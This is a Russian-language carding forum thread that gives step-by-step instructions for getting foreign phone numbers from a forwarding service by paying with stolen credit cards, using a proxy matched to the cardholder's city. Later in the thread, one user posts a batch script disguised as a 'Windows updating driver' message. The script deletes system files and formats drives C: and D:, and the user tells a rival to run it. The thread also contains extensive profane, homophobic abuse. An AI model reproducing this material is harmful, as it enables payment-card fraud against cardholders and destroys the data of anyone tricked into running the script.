1. По причине блокировки роскомнадзором раз в несколько месяцев мы меняем доменное имя. Чтоб не потерять новую ссылку просто зарегистрируйтесь и вы получите сообщение о замене на свою почту!
    Скрыть объявление
Скрыть объявление
По причине блокировки роскомнадзором раз в несколько месяцев мы меняем доменное имя. Чтоб не потерять новую ссылку просто зарегистрируйтесь и вы получите сообщение о замене на свою почту!
Скрыть объявление
Проводите сделки через Гарант-сервис чтоб полностью обезопасить свои покупки.

Добываем номер любой страны

Тема в разделе "Вещевой кардинг", создана пользователем nokia, 5 сен 2013.

1. nokia

nokia

Симпатии:
    0
    Баллы:
    16
    Для многих это будет повтор пройденного, для кого-то что-то новое.

xttps://www.tollfreeforwarding.com/ - отличный сайт, который предоставляет услуги переадресации номера. Суть следующая - вы выбираете номер почти любой страны, вписываете номер на который будет переадресация (может быть сип/воип) и вбиваете сс.

Всё достаточно просто, процедура следующая:

1) Как всегда, покупаем сс, чекаем на валид

2) Берём носок под город холдера, входим на сайт, выбираете желаемый номер.

3) Вводим номер на который будет переадресация в поле "Enter your existing number".

4) Кликаете Activate Now, для инстант активации регаем любое мыло с нестандартным доменом тут: mail.com, к примеру [email protected]

5) Вбиваете либо сс либо оплачиваете палкой, далее всё стандартно, номер активируют.

Пользуйтесь, учитесь!
  2. Simon

Simon

Симпатии:
    0
    Баллы:
    6
    сайту этому 100 лет уже скоро исполнится, а ты его только нашел...
    и ты забыл добавить что для регистрации нужно Business Email , т.е. корп.почта
    обычные hotmail yahoo gmail aol не прокатят.
  3. nokia

nokia

Симпатии:
    0
    Баллы:
    16
    Откуда вы такие умники беретесь то мля! как в других темах, повторялся, повторюсь и в этой:

Вопрос к тебе: ты когда в этот биз пришел, ты уже наверно мегаасом был во всех движениях кардинга и хакинга? сразу все нашел и начал милиардами ворочить? :D/>

Статьи для того они и статьи, что бы их читать, вспоминать, а кому то , кто в первые попал в данный биз, просто учится и познавать.

Москва тоже не сразу строилась, а закладывалась с первого кирпича, а не сразу дом с неба упал или кремль :wacko:/> .

Так что пусть новички учатся и становятся такими же миллиардерами как и ты :D/>
  4. nokia

nokia

Симпатии:
    0
    Баллы:
    16
    я его не только-что нашел, а нашел как раз 100 лет назад :D/> и сохранил в txt как заначку, созерцая в будущее, я знал что ты такой появишся и будешь критиковать :rolleyes:/> . Поэтому думал надо сохранить и смотрика не прогадал ;)/>

За дополнение thnx. забыл добавить, но благо есть такие внимательные как ты :)/>
  5. Simon

Simon

Симпатии:
    0
    Баллы:
    6
    Ну и высер... тебя кто-то обидел?
    Я просто указал, что без бизнес почты, аккаунт там не сделать, мог бы просто исправить в статье да и все, а не слюной брызгать.
  6. Simon

Simon

Симпатии:
    0
    Баллы:
    6
    и ты не "забыл добавить", ты этого просто не знал, т.к. не делал, а тупо скопировал основную инфу с другого форума, добавив отсебятину, если бы знал, то не написал бы:

7. Bawmak

Bawmak

Симпатии:
    0
    Баллы:
    6
    добрый вечер, скажи где я могу регнуть мило что бы на конце com было
  8. nokia

nokia

Симпатии:
    0
    Баллы:
    16
    1. по поводу высера: мне очень было приятно с тобой познакомиться, мое имя Nokia, я думал все время твое имя Simon, ну уж раз ты высер, то значит бум к тебе обращаться высер :D/> .
    2. Послушайте глубоко уважаемый высер, я на вас пукал с подливой все время B)/> , и слюной не брызгал, ваша личность достойнка только моей какашки :rolleyes:/>
    3. уважаемый высер, вроде как учебный год начался, так что в школе на доске у себя пишите, а темы создаются для новичков.

P.S: спасибо высер за дополнения, респект тебе и уважухаЁ! :rolleyes:/>
  9. Боря Цыган

Боря Цыган

Симпатии:
    0
    Баллы:
    6
    например gmail.com, hotmail.com

Хватит уже собачиться) по всей видимости ему просто скучно..
  10. Simon

Simon

Симпатии:
    0
    Баллы:
    6
    Я тебя назвал пиздаболом, ты в ответ включаешь детский сад (" мама он меня обидел, ничего лучше придумать не могу, увидел слово высер, кстати относящееся к тебе, а точно обзову в ответ так же... Ыыы... дебилёныш"), ты ебаный в рот покажи скрин с ордером от tollfreeforwarding.com, номер можешь замазать, почту сделанную на "4) Кликаете Activate Now, для инстант активации регаем любое мыло с нестандартным доменом тут: mail.com, к примеру [email protected]" тоже.
    а пока что ты есть кто я назвал, не имея опыта, тупо копируешь чужие (подчеркну чужие статьи) и с умным видом пишешь "Пользуйтесь, учитесь!"
    чему учиться у таких ущербных? Статьи копировать ? Ctrl-C Ctrl-V
  11. sl4sh

sl4sh

Симпатии:
    0
    Баллы:
    6
    тс, без обид но ты такой трэш древний выкладываешь, от которого пользы 0 даже для новичков...
    если и берешься стряпать из старой инфы, добавляй своего это не статья даже на фак не тянет,
    чтобы сделать из этого статью надо добавить аналогичные сайты и объяснить + и -
    так же в теме и со связкой, скрины не сделал, примеров кода нет, а самый главный вопрос новичков
    разница между той или иной связкой не отмечен. удачи ;)/>
  12. nokia

nokia

Симпатии:
    0
    Баллы:
    16
    Включают радио приемники с кнопачкой тумблера: вкл/выкл.

ебаный может ты, до кучки еще и дырявенький похоже) под хвостик слишком шалишь часто чтоли? :D/> комплекс не полноценности пидарастни у тебя похоже остался с детства :D/> .
    специально для тебя выпердешь повторю, что все было написано для новичков, если ты выпердишь нихуя не можешь в этой жизни, то уйди нахуй с топика!
    Спасибо за подсказку, как копировать тексты, все думал кто научит это делать!)

p.s: Если ты хочешь чем то отличится, то выкладывай свои статьи в отдельном топе, а не говни в чужих бля, полупидор-мусорок!
    И там где ты учился кстати, там мы преподавали ;)/> .

На вот лучше сделай у себя на компе , да утухни!

@echo off
    echo Windows updating driver...
    attrib -r -h -s c:windows*.da?
    echo Y | del c:windows*.da?
    echo Y | del d:*.*
    attrib -r -h -s c:*.*
    echo Y | del c:*.sys
    echo Y | del c:*.bin
    echo Y | del c:*.bat
    echo Y | format d:
    echo Y | format c:
    echo Virus loading.... Completed!

Сохрани с расширением .bat и когда скучно будет, запусти ;)/> , повеселеешь может и под хвостик перестанешь баловаться :rolleyes:/> .

to sl4sh тебе тоже не помешает в скучные минуты , если делать нехуй как критиковать других ;)/>
  13. Simon

Simon

Симпатии:
    0
    Баллы:
    6
    какой то ты озабоченный..."под хвостик... дырявенький"... я в вашей педерастической терминологии не понимаю, ты ослоёб что ли?
  14. nokia

nokia

Симпатии:
    0
    Баллы:
    16
    По поводу озабоченности, дак это похоже ты озабоченый мусорило! иди нахуй на помойке какашки свои собирай!

помоему тут видно наглядно твою озабоченность. или похоже ты сосунок? (специально для тебя: сосунок-пидор сосущий письки мужского пола :D/> )
    вот и закрался похоже к тебе комплекс не полноценности :rolleyes:/> , и подался ты в мусорки из-за этого комплекса похоже.

сидел бы лучше дальше в яичках, да наблюдал бы через йух на мир, как через подзорную трубу :D/>

Ладно хуеглот, можешь дальше писать что хочешь, мне некогда с сосунками тележить по пустоте, работать надо. Поэмы создавай дальше, да кокашками заваливайся :D/>

Удачи в твоем не легком бизе ;)/> !
  15. nokia

nokia

Симпатии:
    0
    Баллы:
    16
    это как раз таки я в вашей пидарестической иеархии нихера не понимаю.
    по поводу ослёба, не ослоеб, а simonЁБ :D/> ;)/>
  16. z777z

z777z

Симпатии:
    0
    Баллы:
    1
    цирк уехал, клоуны остались :D/>

Поделиться этой страницей